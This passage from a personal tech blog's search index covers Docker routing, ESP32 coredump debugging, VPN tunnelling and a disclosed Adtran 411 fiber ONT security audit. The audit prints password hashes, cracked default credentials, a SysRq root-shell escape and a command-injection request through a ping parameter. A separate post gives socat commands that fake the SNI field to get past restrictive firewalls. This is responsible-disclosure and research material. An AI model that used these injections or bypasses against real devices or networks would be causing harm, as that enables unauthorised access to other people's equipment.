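The route-label grammar described above (semicolon-separated or multi-line `CIDR via GATEWAY` entries) is simple enough to parse in a few lines. The following is an illustrative Python sketch of that parsing step, not drouter's own code:

```python
# Sketch of parsing drouter-style route labels (illustrative only,
# not drouter's actual implementation). Entries may be separated by
# semicolons or newlines, each of the form "<CIDR> via <gateway>".
def parse_routes(label: str):
    routes = []
    for entry in label.replace(";", "\n").splitlines():
        entry = entry.strip()
        if not entry:
            continue
        dest, via, gateway = entry.split()
        if via != "via":
            raise ValueError(f"malformed route entry: {entry!r}")
        routes.append((dest, gateway))
    return routes

print(parse_routes("10.0.0.0/8 via 192.168.1.254;172.16.0.0/12 via 192.168.1.253"))
```

Each resulting `(destination, gateway)` pair maps directly onto an `ip route add <destination> via <gateway>` invocation inside the container's namespace.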
Give it a try if you\u0026rsquo;re dealing with complex Docker networking scenarios!\n","permalink":"https://lanrat.com/posts/drouter-docker-routing/","summary":"\u003cp\u003eWhen working with Docker containers on complex networks, you often need to add static routes so containers can reach networks that aren\u0026rsquo;t directly connected to their default gateway. This becomes especially important when using \u003ca href=\"https://docs.docker.com/network/drivers/macvlan/\"\u003emacvlan\u003c/a\u003e network drivers where containers get their own IP addresses on your physical network.\u003c/p\u003e\n\u003cp\u003eI\u0026rsquo;ve just released \u003ca href=\"https://github.com/lanrat/drouter\"\u003edrouter\u003c/a\u003e, a lightweight systemd service that solves this problem by automatically injecting routes into Docker containers based on simple labels.\u003c/p\u003e\n\u003ch2 id=\"the-problem\"\u003eThe Problem\u003c/h2\u003e\n\u003cp\u003eConsider this scenario: you\u0026rsquo;re using a macvlan network driver so your containers get real IP addresses on your network (say \u003ccode\u003e192.168.1.0/24\u003c/code\u003e). Your router is at \u003ccode\u003e192.168.1.1\u003c/code\u003e, but you have additional internal subnets like \u003ccode\u003e10.0.0.0/8\u003c/code\u003e that are reachable through a different gateway at \u003ccode\u003e192.168.1.254\u003c/code\u003e.\u003c/p\u003e","title":"Drouter: Dynamic Route Injection for Docker Containers"},{"content":"ARIN IPv4 Wait-list Tracking analyzes ARIN\u0026rsquo;s IPv4 address wait-list and provides statistical insights into wait times and allocation patterns. The Python-based system tracks historical data on IPv4 block requests and clearances to estimate processing times for different network block sizes.\nThe web dashboard displays real-time analytics including current wait-list sizes, estimated wait times for /22, /23, and /24 blocks, and historical trends in IPv4 address allocation. 
This tool helps network administrators understand IPv4 scarcity patterns and plan address allocation strategies as IPv4 exhaustion continues.\n","permalink":"https://lanrat.com/projects/arin-ipv4-waitlist-tracking/","summary":"\u003cp\u003eARIN IPv4 Wait-list Tracking analyzes ARIN\u0026rsquo;s IPv4 address wait-list and provides statistical insights into wait times and allocation patterns. The Python-based system tracks historical data on IPv4 block requests and clearances to estimate processing times for different network block sizes.\u003c/p\u003e\n\u003cp\u003eThe web dashboard displays real-time analytics including current wait-list sizes, estimated wait times for /22, /23, and /24 blocks, and historical trends in IPv4 address allocation. This tool helps network administrators understand IPv4 scarcity patterns and plan address allocation strategies as IPv4 exhaustion continues.\u003c/p\u003e","title":"ARIN IPv4 Waitlist Tracking"},{"content":"When developing with ESPHome on ESP32 devices, crashes can be frustrating to debug without proper stack traces. Enabling coredumps provides detailed crash information to help identify the root cause of issues.\nConfiguration To enable coredump functionality, you\u0026rsquo;ll need to modify your ESPHome configuration and create a custom partition table. 
This setup is for the Arduino framework - ESP-IDF configurations will differ slightly.\nESPHome Configuration Add the following to your ESPHome YAML configuration:\nesp32: framework: type: arduino # Partitions file seems to require full path partitions: /full/path/to/custom_partitions_core_dump.csv esphome: platformio_options: build_flags: - -DCONFIG_ESP_COREDUMP_ENABLE_TO_FLASH=y - -DCONFIG_ESP32_COREDUMP_DATA_FORMAT_ELF=y - -DCONFIG_ESP32_COREDUMP_CHECKSUM_CRC32=y # Optional: Button to trigger test crashes button: - platform: template name: \u0026#34;Test Crash\u0026#34; id: crash_button on_press: then: - lambda: |- ESP_LOGE(\u0026#34;test\u0026#34;, \u0026#34;Crashing device intentionally!\u0026#34;); int* p = nullptr; *p = 42; Custom Partition Table Create a custom partition table file (custom_partitions_core_dump.csv). This is an example for an ESP32 with 8MB flash:\n# Name, Type, SubType, Offset, Size, Flags nvs, data, nvs, 0x9000, 0x5000, otadata, data, ota, 0xE000, 0x2000, app0, app, ota_0, 0x10000, 0x3C0000, app1, app, ota_1, 0x3D0000, 0x3C0000, eeprom, data, 0x99, 0x790000, 0x1000, coredump, data, coredump, 0x791000, 0x10000, spiffs, data, spiffs, 0x7A1000, 0x5F000 The key addition is the coredump partition which reserves 64KB (0x10000) of flash storage for crash dumps.\nExtracting Coredumps When a crash occurs, the ESP32 will write the coredump to the dedicated partition. 
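The example partition table above can be sanity-checked before flashing. This short Python sketch (offsets and sizes copied from the CSV above) verifies that no partitions overlap and that the table fits in 8MB of flash:

```python
# Sanity-check the example 8MB partition table: no overlapping regions,
# and the whole layout fits in flash. Offsets/sizes copied from the CSV.
parts = [
    ("nvs",      0x9000,   0x5000),
    ("otadata",  0xE000,   0x2000),
    ("app0",     0x10000,  0x3C0000),
    ("app1",     0x3D0000, 0x3C0000),
    ("eeprom",   0x790000, 0x1000),
    ("coredump", 0x791000, 0x10000),
    ("spiffs",   0x7A1000, 0x5F000),
]
FLASH_SIZE = 8 * 1024 * 1024  # 8MB flash

end = 0
for name, offset, size in sorted(parts, key=lambda p: p[1]):
    assert offset >= end, f"{name} overlaps the previous partition"
    end = offset + size
assert end <= FLASH_SIZE, "table exceeds flash size"
print(f"ok, {FLASH_SIZE - end:#x} bytes unused")
```

For a 4MB or 16MB chip the same check applies with a different `FLASH_SIZE` and adjusted offsets.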
To analyze it:\nCopy the firmware ELF file (needed for symbol resolution):\ncp .esphome/build/your-device/.pioenvs/your-device/firmware.elf firmware.elf Extract and analyze the coredump:\nesp-coredump --port /dev/ttyACM0 info_corefile --save-core=my_core_dump.bin --core-format=raw firmware.elf \u0026gt; coredump.txt Save coredump for offline analysis:\n# Extract raw coredump from flash esptool.py --port /dev/ttyACM0 read_flash 0x791000 0x10000 coredump.bin # Erase the coredump partition for next crash esptool.py --port /dev/ttyACM0 erase_region 0x791000 0x10000 # Analyze offline esp-coredump info_corefile --core coredump.bin --core-format=raw firmware.elf Installing ESP-IDF Tools The esp-coredump tool is part of the ESP-IDF framework. Install it by cloning the ESP-IDF repository:\ngit clone --depth 1 --recursive https://github.com/espressif/esp-idf.git cd esp-idf ./install.sh # run this every time to add the esp-idf tools to your PATH . ./export.sh Online Stack Trace Decoder For quick analysis without local ESP-IDF installation, use the ESPHome Stack Trace Decoder web tool. Simply paste your stack trace and firmware ELF file to get decoded function names and line numbers.\nSummary Coredump debugging significantly improves the development experience when working with ESPHome on ESP32 devices. The detailed crash information helps identify issues that would otherwise require extensive trial-and-error debugging. Once configured, coredumps are automatically generated on each crash, overwriting the previous dump.\n","permalink":"https://lanrat.com/posts/esphome-coredump-debugging/","summary":"\u003cp\u003eWhen developing with ESPHome on ESP32 devices, crashes can be frustrating to debug without proper stack traces. 
Enabling coredumps provides detailed crash information to help identify the root cause of issues.\u003c/p\u003e\n\u003ch2 id=\"configuration\"\u003eConfiguration\u003c/h2\u003e\n\u003cp\u003eTo enable coredump functionality, you\u0026rsquo;ll need to modify your ESPHome configuration and create a custom partition table. This setup is for the Arduino framework - ESP-IDF configurations will differ slightly.\u003c/p\u003e\n\u003ch3 id=\"esphome-configuration\"\u003eESPHome Configuration\u003c/h3\u003e\n\u003cp\u003eAdd the following to your ESPHome YAML configuration:\u003c/p\u003e","title":"ESPHome ESP32 Coredump Debugging"},{"content":"Adtran 411 Security Audit Adtran produces equipment for fiber ISPs. I was provided an Adtran 411 by my current ISP for Internet access and decided to take a deep look into it.\nHardware The Adtran 411 is a small GPON fiber ONT (Optical Network Terminal) designed to give symmetrical gigabit fiber Internet to SOHO users. It connects to the ISP via a GPON uplink and provides the user a normal ethernet RJ-45 connector to plug their router into and a RJ-11 port for a landline to be tunneled over VOIP.\nThe fiber ONT has a Broadcom MIPS CPU that also provides the network card as well.\nThe first step to learning more about the device is to look for any possible UART connections to grab serial logs. If present, the UART can provide boot logs and allow interacting with the device at a low level. Ideally this could also provide access to the bootloader and interact with the OS.\nA UART can be identified by 3-4 pins, which will include Ground, Tx, Rx, and possibly a VCC. The Adtran just happened to have a hidden 4 pin header inside the device. Using a multimeter and logic analyzer revealed the pinout, and was able to provide the boot logs from the device. Amusingly, it can be accessed entirely externally by pushing wires through the vent holes!\nThe UART boot logs revealed that the device uses the uBoot boot loader and runs Linux. 
Once booted, it prompts for login credentials.\nDumping the Filesystem The hardware contains a NAND flash chip. This acts as the persistent storage for the device. The ideal way to dump it is to desolder the NAND flash chip and read it with an external NAND dumper; however, removing and resoldering the chip risks damaging the device.\nThe NAND flash can also be dumped on-device using a much slower method through uBoot. This method uses the UART serial connection to tell uBoot to load the entire contents of the NAND flash into memory, then read that memory back and print it as hex over the UART serial console. While this is running, log all of the serial output; the hex output can later be parsed to reconstruct the binary contents of the flash.\nThis can be done using tools like screen, grep, sed, xxd, etc. Converting from binary to hex+ASCII over a serial connection is incredibly slow. This can be automated with the Python tool bcm-cfedump. It took 15.5 hours to dump 128MB.\nExploring the Filesystem The boot logs contained the partition layout for the NAND flash. We can use dd to carve out the individual partitions from the dump.\ndd bs=1 if=nand.bin of=nvram.bin skip=0 count=131072 dd bs=1 if=nand.bin of=update.bin count=64356352 skip=131072 dd bs=1 if=nand.bin of=rootfs.bin count=64356352 skip=64487424 dd bs=1 if=nand.bin of=data.bin count=4194304 skip=128974848 Next, the files from the embedded JFFS2 filesystem can be extracted with the jefferson tool.\nUsers \u0026amp; Passwords With access to the entire flash filesystem, it is possible to read /etc/passwd to get a list of users. Surprisingly, this also contained password hashes. 
On modern Linux systems, password hashes are stored in /etc/shadow, but this system had all of the hashes in the passwd file.\nadmin:$1$fiLRvAiv$WhZdXwZIDJ4QvO0XB1fdk0:0:0:Administrator:/:/bin/sh support:$1$g0vSrd8Z$gBnlXTkhvDr4dJrFP0I1n1:0:0:Technical Support:/:/bin/sh user:$1$7GYEnL0B$MbHFofzaMetppUwgKmvfv0:0:0:Normal User:/:/bin/sh nobody:$1$cd1QZr5m$TUd00gjlgEa8C/WZ0RMa9.:0:0:nobody for ftp:/:/bin/sh There were four users, all of whom belonged to the root group, gid 0. The password hashes use the MD5 crypt algorithm, as indicated by the $1$ prefix.\nI was able to crack two of the password hashes using cheap online hash cracking services. This revealed the following two passwords:\nuser:user support:support I\u0026rsquo;m a little embarrassed that I did not guess these passwords initially. It\u0026rsquo;s also very unusual that the nobody user has a password and a shell assigned to it, especially since it\u0026rsquo;s apparently meant only for FTP, as the account name suggests.\nThese credentials worked to log in on the UART shell, but more on that later\u0026hellip;\nSysRq There was this SysRq message in the boot logs. SysRq is an abbreviation for System Rq. What is System Rq?\nThe magic SysRq key is a key combination understood by the Linux kernel, which allows the user to perform various low-level commands regardless of the system\u0026rsquo;s state. It is often used to recover from freezes. This key combination provides access to features for disaster recovery.\nThe keystrokes are: [Alt] + [SysRq] + [Command Key], however, over UART in screen: [Ctrl-A] + [Ctrl-B] + [Command Key]. On systems that have SysRq enabled, it\u0026rsquo;s possible to enter a root shell at any time by sending a special keystroke to the device. Sending the command for SIGKILL drops to a root shell!\nNetwork Scan The boot logs revealed the device assigns itself a static IP of 192.168.1.1. 
Statically adding an IP on the same subnet to your machine connected to the ONT over ethernet allows direct network communication. A port scan reveals that there are two services running: HTTP and Telnet.\nTelnet Service The telnet interface drops you into the same restricted, authentication-gated shell as the UART. The passwords collected previously from the filesystem work!\nAfter logging in, you are dropped to a very limited custom CLI. It\u0026rsquo;s not a traditional shell. There are only a few limited debugging commands available, like ping. Is it possible to escape this limited shell? Yes!\nTelnet Command Injection The ping command allows for command injection via semicolon (;).\nWeb HTTP Service Accessing the device over the network on port 80 presents an HTTP login form, which the previously collected credentials worked on. Logging in as user provides some limited viewing of settings in the web interface. The access control page makes it clear the admin user has more permissions\u0026hellip;\nFrom the filesystem exploration, it was possible to identify additional hidden web pages that were not linked to in the menus.\n/engdebug.html allows for mirroring network port traffic for debugging\n/packatcapture.html allows for creating PCAP files for any interface.\nThese debug pages provided very privileged access for a non-admin user.\nWeb Command Injection The ping utility has the same command injection vulnerability as the CLI. You need to use two requests: one to run the command, and another to read the response.\nSending an HTTP GET request to /ping.txt?action=ping\u0026amp;command=cat%20/proc/cpuinfo will initiate the \u0026ldquo;ping\u0026rdquo; command that will actually run the PoC command cat /proc/cpuinfo. 
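This fetch-then-read pattern is easy to script. Below is a hedged Python sketch that only builds the two request URLs; the device IP and endpoint paths are taken from the post, while the helper function name is mine:

```python
# Sketch of the two-step "ping" command injection described above.
# Builds the fetch-then-read request URLs; the device IP (192.168.1.1)
# and endpoint paths come from the post, everything else is illustrative.
from urllib.parse import quote

def injection_urls(command: str, host: str = "192.168.1.1"):
    run = f"http://{host}/ping.txt?action=ping&command={quote(command)}"
    read = f"http://{host}/ping.txt?action=refresh"
    return run, read

run_url, read_url = injection_urls("cat /proc/cpuinfo")
print(run_url)  # request this first, then fetch read_url for the output
```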
The response from that command can later be received by requesting /ping.txt?action=refresh.\nDumping More Credentials There was another hidden HTTP endpoint at dumpsysinfo.html, accessible to the non-admin user, that allows for the creation of a \u0026ldquo;system information dump\u0026rdquo;. This dumps the entire config, including all user passwords, to a plain text XML file. Now I have the admin password! The dump also includes SIP and other passwords.\nControl Plane With live shell access to the device, when plugged in and online, there are lots of internal interfaces online, including internal network interfaces, VLANs, and bridges. One of these interfaces is the control plane interface, which provides some limited access to the ISP\u0026rsquo;s management network.\nThe main bridge br0 is the customer facing ethernet connection with the 192.168.1.1 IP address. There is also an IP in 10.8.128.0/19 on VLAN 702 on the GPON fiber interface. This is a huge subnet with \u0026gt;8k IPs, likely containing all of the ISP\u0026rsquo;s other customers in this area. I was able to confirm other customers of this ISP could ping hosts on the control plane from behind their ONT.\nAll of the network services (Telnet, HTTP) are listening on all interfaces, including the control plane. In theory this could allow a customer behind a compromised ONT to compromise other customers remotely. With permission from my ISP I tested this, and it does appear that customer to customer ONT traffic is blocked. However, some other devices on the control plane were still reachable, including the gateway, DNS, and VOIP server.\nDisclosure None of these findings were the ISP\u0026rsquo;s fault. All issues reside in the firmware for the Adtran ONT. As soon as the ISP was made aware, they took steps to make Adtran fix the issues and worked with me to do further testing. 
This is a security success story.\nFebruary 6, 2024 submitted a support request to Adtran to disclose February 9, 2024 submitted a 2nd support request to Adtran February 26, 2024 emailed ISP support to disclose February 29, 2024 heard back from ISP and provided all technical details of all findings ISP acknowledges receiving findings March 1, 2024 ISP gives me permission and access to a test setup to test attacking other ONTs Tests successfully fail. March 7, 2024 ISP confirms Adtran is addressing the issues October 17, 2024 Adtran test firmware is pushed to my home ONT for testing I am given preview access to the new firmware and confirm all issues mitigated UART/telnet/HTTP services are all disabled December 30, 2024 Fixes start rolling out to customers. CVEs (Common Vulnerabilities and Exposures) CVE-2025-22937 debug serial console in Adtran 411 allows SysRq escape to root shell CVE-2025-22938 Weak default passwords in Adtran 411 CVE-2025-22939 command injection in telnet server in Adtran 411 allows remote attacker arbitrary root command execution CVE-2025-22940 web server in Adtran 411 allows unprivileged user to set/read admin password CVE-2025-22941 command injection in web server in Adtran 411 allows remote attacker arbitrary root command execution BSidesSF: Adventures \u0026amp; Findings in ISP Hacking This content was covered in a talk I gave at BSidesSF 2025.\nSlides ","permalink":"https://lanrat.com/posts/adtran-isp-hacking/","summary":"\u003ch1 id=\"adtran-411-security-audit\"\u003eAdtran 411 Security Audit\u003c/h1\u003e\n\u003cp\u003eAdtran produces equipment for fiber ISPs. 
I was provided an Adtran 411 by my current ISP for Internet access and decided to take a deep look into it.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Adtran 411 Front Panel\" loading=\"lazy\" src=\"/posts/adtran-isp-hacking/images/adtran-device-front-panel.webp\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Adtran 411 Back Panel\" loading=\"lazy\" src=\"/posts/adtran-isp-hacking/images/adtran-device-back-panel.webp\"\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Adtran 411 Ports Closeup\" loading=\"lazy\" src=\"/posts/adtran-isp-hacking/images/adtran-device-ports-closeup.webp\"\u003e\u003c/p\u003e\n\u003ch2 id=\"hardware\"\u003eHardware\u003c/h2\u003e\n\u003cp\u003eThe Adtran 411 is a small GPON fiber ONT (Optical Network Terminal) designed to give symmetrical gigabit fiber Internet to SOHO users. It connects to the ISP via a GPON uplink and provides the user a normal ethernet RJ-45 connector to plug their router into and a RJ-11 port for a landline to be tunneled over VOIP.\u003c/p\u003e","title":"Adtran Fiber ISP Hacking"},{"content":"A real-time visualization of day and night regions across the world using accurate solar and lunar positioning calculations. The project renders day/night terminator lines, solar and lunar positions, and smooth twilight gradients on an interactive world map using HTML5 Canvas.\nThe visualization integrates the SunCalc library for astronomical calculations and features optimized pixel-level rendering with support for multiple map projections (Equirectangular and Mercator). Additional features include moon phase visualization, responsive design, timezone customization, and a grayscale mode optimized for e-ink displays. The map updates every minute to reflect current celestial conditions.\n","permalink":"https://lanrat.com/projects/day-night-map/","summary":"\u003cp\u003eA real-time visualization of day and night regions across the world using accurate solar and lunar positioning calculations. 
The project renders day/night terminator lines, solar and lunar positions, and smooth twilight gradients on an interactive world map using HTML5 Canvas.\u003c/p\u003e\n\u003cp\u003eThe visualization integrates the SunCalc library for astronomical calculations and features optimized pixel-level rendering with support for multiple map projections (Equirectangular and Mercator). Additional features include moon phase visualization, responsive design, timezone customization, and a grayscale mode optimized for e-ink displays. The map updates every minute to reflect current celestial conditions.\u003c/p\u003e","title":"Day Night Map"},{"content":"VLAN Scout discovers active VLANs and their configurations through passive monitoring and active probing. The tool identifies VLAN segments by analyzing network traffic and attempting connections across different VLAN IDs.\nThe implementation supports multiple discovery protocols including DHCP, IPv6 neighbor discovery, LLDP, and CDP. VLAN Scout can operate in both passive monitoring mode to observe existing traffic and active probing mode to test VLAN accessibility and configuration.\n","permalink":"https://lanrat.com/projects/vlan-scout/","summary":"\u003cp\u003eVLAN Scout discovers active VLANs and their configurations through passive monitoring and active probing. The tool identifies VLAN segments by analyzing network traffic and attempting connections across different VLAN IDs.\u003c/p\u003e\n\u003cp\u003eThe implementation supports multiple discovery protocols including DHCP, IPv6 neighbor discovery, LLDP, and CDP. VLAN Scout can operate in both passive monitoring mode to observe existing traffic and active probing mode to test VLAN accessibility and configuration.\u003c/p\u003e","title":"VLAN Scout"},{"content":"Bambu P1S Hacking contains firmware dumps, PCB analysis, and X-ray scans of the Bambu Labs P1S 3D printer\u0026rsquo;s ESP32-S3 controller board. 
The repository documents reverse engineering efforts to understand the printer\u0026rsquo;s firmware architecture and hardware implementation.\nThe collection includes multiple firmware dumps processed through bin-voter to generate corrected flash images, detailed PCB trace analysis, and hardware documentation. This research provides insights into the printer\u0026rsquo;s embedded systems and potential modification opportunities.\n","permalink":"https://lanrat.com/projects/bambu-p1s-hacking/","summary":"\u003cp\u003eBambu P1S Hacking contains firmware dumps, PCB analysis, and X-ray scans of the Bambu Labs P1S 3D printer\u0026rsquo;s ESP32-S3 controller board. The repository documents reverse engineering efforts to understand the printer\u0026rsquo;s firmware architecture and hardware implementation.\u003c/p\u003e\n\u003cp\u003eThe collection includes multiple firmware dumps processed through bin-voter to generate corrected flash images, detailed PCB trace analysis, and hardware documentation. This research provides insights into the printer\u0026rsquo;s embedded systems and potential modification opportunities.\u003c/p\u003e","title":"Bambu P1S Hacking"},{"content":"Bin Voter reconstructs correct binary files from multiple corrupted firmware dumps by implementing a voting algorithm across byte positions. The tool compares corresponding bytes from multiple binary files and selects the most frequently occurring value at each position.\nThis Python utility is designed for firmware recovery scenarios where multiple partial or corrupted dumps are available but no single dump is completely intact. Bin Voter can recover clean firmware images by leveraging statistical analysis across multiple corrupted sources.\n","permalink":"https://lanrat.com/projects/bin-voter/","summary":"\u003cp\u003eBin Voter reconstructs correct binary files from multiple corrupted firmware dumps by implementing a voting algorithm across byte positions. 
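The voting step can be sketched in a few lines of Python (illustrative only, not Bin Voter's actual implementation):

```python
# Minimal sketch of byte-wise majority voting across several corrupted
# dumps (illustrative, not Bin Voter's actual implementation).
from collections import Counter

def vote(dumps: list[bytes]) -> bytes:
    assert len({len(d) for d in dumps}) == 1, "dumps must be equal length"
    return bytes(
        Counter(column).most_common(1)[0][0]  # most frequent byte wins
        for column in zip(*dumps)
    )

# Three dumps, each corrupted in a different position:
print(vote([b"firmwa_e", b"f_rmware", b"firmw_re"]))  # b'firmware'
```

With three or more dumps, any byte position corrupted in only a minority of them is recovered correctly; positions corrupted in most dumps remain wrong, which is why more source dumps help.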
The tool compares corresponding bytes from multiple binary files and selects the most frequently occurring value at each position.\u003c/p\u003e\n\u003cp\u003eThis Python utility is designed for firmware recovery scenarios where multiple partial or corrupted dumps are available but no single dump is completely intact. Bin Voter can recover clean firmware images by leveraging statistical analysis across multiple corrupted sources.\u003c/p\u003e","title":"Bin Voter"},{"content":"DPRK.team is a satirical website that parodies authoritarian cybersecurity organizations through the fictional \u0026ldquo;Glorious People\u0026rsquo;s Cybersecurity Directorate.\u0026rdquo; The site presents cybersecurity services using exaggerated revolutionary rhetoric and propaganda-style messaging that mimics state-controlled digital security agencies.\nThe project serves as a humorous commentary on totalitarian approaches to cybersecurity and digital sovereignty. The website includes typical corporate sections like services, team profiles, and past work, all delivered through an over-the-top ideological lens that lampoons authoritarian cybersecurity practices and terminology.\n","permalink":"https://lanrat.com/projects/dprk.team/","summary":"\u003cp\u003eDPRK.team is a satirical website that parodies authoritarian cybersecurity organizations through the fictional \u0026ldquo;Glorious People\u0026rsquo;s Cybersecurity Directorate.\u0026rdquo; The site presents cybersecurity services using exaggerated revolutionary rhetoric and propaganda-style messaging that mimics state-controlled digital security agencies.\u003c/p\u003e\n\u003cp\u003eThe project serves as a humorous commentary on totalitarian approaches to cybersecurity and digital sovereignty. 
The website includes typical corporate sections like services, team profiles, and past work, all delivered through an over-the-top ideological lens that lampoons authoritarian cybersecurity practices and terminology.\u003c/p\u003e","title":"DPRK.team"},{"content":"Tunneling WireGuard over TLS using SNI Domain Fronting There are numerous ways to get unrestricted egress on a restricted network. Here I will demonstrate how to use socat to tunnel a UDP connection over a TLS tunnel with a faked SNI domain in order to bypass network restrictions.\nThis technique works on a restricted network that allows outbound TLS traffic to at least a single domain, but only checks the domain in the TLS Client Hello SNI field, and not the destination IP address. I have found this to be a common setup on many captive portal or restricted networks making use of a DPI firewall to block all other network traffic.\nOnce a UDP tunnel is established, a UDP VPN such as WireGuard can be used to route all traffic unrestricted.\nIn order to test if this strategy would work on a restricted network, make a request to an HTTPS server with fake SNI information and verify that you get a response from the server you make the request to. Not all servers send an HTTP response for hosts they are not responsible for, but most seem to. Even if it\u0026rsquo;s an error message, that\u0026rsquo;s enough to verify that the connection successfully egressed the network and reached the destination server. I\u0026rsquo;ve found Cloudflare\u0026rsquo;s 1.1.1.1 does exactly this.\nUse the following command, replacing SNI_DOMAIN with the domain you want to test with. Remember, the SNI_DOMAIN needs to be a domain that the network allows HTTPS connections to. 
If the intended server responds, like the Cloudflare example below, then this method will work.\n$ curl -vk --resolve $SNI_DOMAIN:443:1.1.1.1 \u0026#34;https://$SNI_DOMAIN\u0026#34; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt;\u0026lt;title\u0026gt;403 Forbidden\u0026lt;/title\u0026gt;\u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;center\u0026gt;\u0026lt;h1\u0026gt;403 Forbidden\u0026lt;/h1\u0026gt;\u0026lt;/center\u0026gt; \u0026lt;hr\u0026gt;\u0026lt;center\u0026gt;cloudflare\u0026lt;/center\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; Server The server only needs to be able to receive inbound network traffic on port 443. Any cheap VPS will do. A WireGuard server is also needed and can run on the same VPS. Setting up a WireGuard server is outside the scope of this post.\nCreating a SSL Certificate The server will need a TLS certificate to use for the TLS connection. Since the SNI information will be fake and the tunneled UDP connection will verify server/client keys, the security of this certificate does not matter too much. But be sure to replace the subj parameters with the desired values.\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj \u0026#34;/C=XX/ST=StateName/L=CityName/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname\u0026#34; Keep the key.pem and cert.pem files safe for use with socat.\nSocat Server The socat server is what listens for inbound TLS connections and forwards the tunneled UDP traffic to the desired host.\nSet the following variables:\nUDP_DEST - Destination host to relay UDP packets to. This will be the address of the WireGuard Server. UDP_DEST_PORT - Destination port for UDP packets. Often 51820 for WireGuard. 
socat -d \\ OPENSSL-LISTEN:443,fork,reuseaddr,keepalive,cert=\u0026#34;cert.pem\u0026#34;,key=\u0026#34;key.pem\u0026#34;,verify=0,su=nobody,nodelay \\ UDP-SENDTO:\u0026#34;$UDP_DEST:$UDP_DEST_PORT\u0026#34; Client The client is made up of the socat client and the WireGuard client, which connects to the server through the socat tunnel.\nSocat Client The socat client runs on the client device on the restricted network. It connects to the socat server, establishing a TLS connection with a fake SNI domain to trick the firewall into allowing the traffic.\nSet the following variables:\nSERVER - The IP or hostname of the server that runs the socat listener. SNI_DOMAIN - The domain to fake traffic to. Set this to an allowed domain to appear in the SNI field of the ClientHello packet. UDP_LISTEN_PORT - UDP port to listen on locally for traffic to relay. Set to something like 51820 if using WireGuard. socat -d -t10 -T10 \\ UDP4-LISTEN:\u0026#34;$UDP_LISTEN_PORT\u0026#34;,fork,bind=127.0.0.1 \\ OPENSSL:\u0026#34;$SERVER\u0026#34;:443,verify=0,snihost=\u0026#34;$SNI_DOMAIN\u0026#34;,keepalive,nodelay Remove bind=127.0.0.1 to have the socat client listen for UDP traffic on all interfaces.\nOptionally, socat can verify the server\u0026rsquo;s certificate, but that is outside the scope of this post and not needed if the tunneled connection does the verification, which is the case for WireGuard.\nWireGuard Client Set the WireGuard MTU to 1280 to account for the smaller packet size allowed due to the overhead of TLS tunneling.\nTraffic destined for the socat SERVER will need to be routed directly and not over the WireGuard interface. This can be achieved by setting the AllowedIPs in the WireGuard config to exclude the IP of the socat server. 
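If you prefer to compute the exclusion yourself, Python's standard ipaddress module can split 0.0.0.0/0 around a single host. A sketch, using a placeholder server IP:

```python
# Sketch of computing a WireGuard AllowedIPs list that routes everything
# except the socat server's IP (203.0.113.5 is a placeholder address).
import ipaddress

server = ipaddress.ip_network("203.0.113.5/32")
everything = ipaddress.ip_network("0.0.0.0/0")
allowed = sorted(everything.address_exclude(server))
print(", ".join(str(net) for net in allowed))
```

Excluding a single /32 from 0.0.0.0/0 always yields 32 CIDR blocks, one for each prefix length from /1 to /32.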
If the socat client is on a different host than the WireGuard client, the socat client\u0026rsquo;s IP will need to be excluded from AllowedIPs as well.\nTools like the WireGuard AllowedIPs Calculator can generate the AllowedIPs section of the WireGuard config to exclude a few select IPs and route everything else through the tunnel.\nNote Other services that may be listening on other ports on the server will likely still be inaccessible.\nResults Tunnel Speedtest: Normal Speedtest: It\u0026rsquo;s not pretty, but it works.\nEDIT 2025-05-28: Added information for testing with curl and WireGuard AllowedIPs.\n","permalink":"https://lanrat.com/posts/sni-domain-fronting-vpn/","summary":"\u003ch1 id=\"tunneling-wireguard-over-tls-using-sni-domain-fronting\"\u003eTunneling WireGuard over TLS using SNI Domain Fronting\u003c/h1\u003e\n\u003cp\u003eThere are numerous ways to get unrestricted egress on a restricted network. Here I will demonstrate how to use \u003ca href=\"https://linux.die.net/man/1/socat\"\u003esocat\u003c/a\u003e to tunnel a UDP connection over a TLS tunnel with a faked \u003ca href=\"https://en.wikipedia.org/wiki/Server_Name_Indication\"\u003eSNI\u003c/a\u003e domain in order to bypass network restrictions.\u003c/p\u003e\n\u003cp\u003eThis technique works on a restricted network that allows outbound TLS traffic to at least a single domain, but only checks the domain in the TLS Client Hello SNI field, and not the destination IP address. 
I have found this to be a common setup on many captive portal or restricted networks making use of a \u003ca href=\"https://en.wikipedia.org/wiki/Deep_packet_inspection\"\u003eDPI\u003c/a\u003e firewall to block all other network traffic.\u003c/p\u003e","title":"SOCAT and WireGuard: a perfect pair for DPI Bypass"},{"content":"This post outlines the process to replace a Tuya radio module with one running ESPHome to fully control a heated mattress pad locally with Home Assistant.\nI purchased a Sunbeam Heated Mattress Pad for those cold winter nights. The mattress pad controller connects to WiFi and has a remote control app. However, it has a safety feature that limits functionality. The app cannot turn the pad on unless you\u0026rsquo;ve recently pressed a physical button on the controller, effectively limiting the app to changing heat levels and turning the device off.\nI wondered about the usefulness of an app to control your bed temperature when you\u0026rsquo;re already lying next to the controller\u0026rsquo;s ON button. But I suppose some people prefer using their phone, which is likely already in hand, rather than reaching for a button on the nightstand.\nLocal Control For better security and privacy, I explored ways to control the heated mattress pad through my Home Assistant instance.\nThe controller uses the Tuya IoT platform, which can integrate with Home Assistant through the unofficial LocalTuya integration. While setup required registering with the Tuya API and initially connecting the device to the Internet, once configured, I could firewall the controller from the Internet while maintaining full control through Home Assistant. This solution worked well for a while.\nCustom Firmware I eventually wanted more comprehensive local control and the ability to fully integrate the device with my other Home Assistant automations. For example, preheating the bed at bedtime when the outside temperature drops below a certain point.
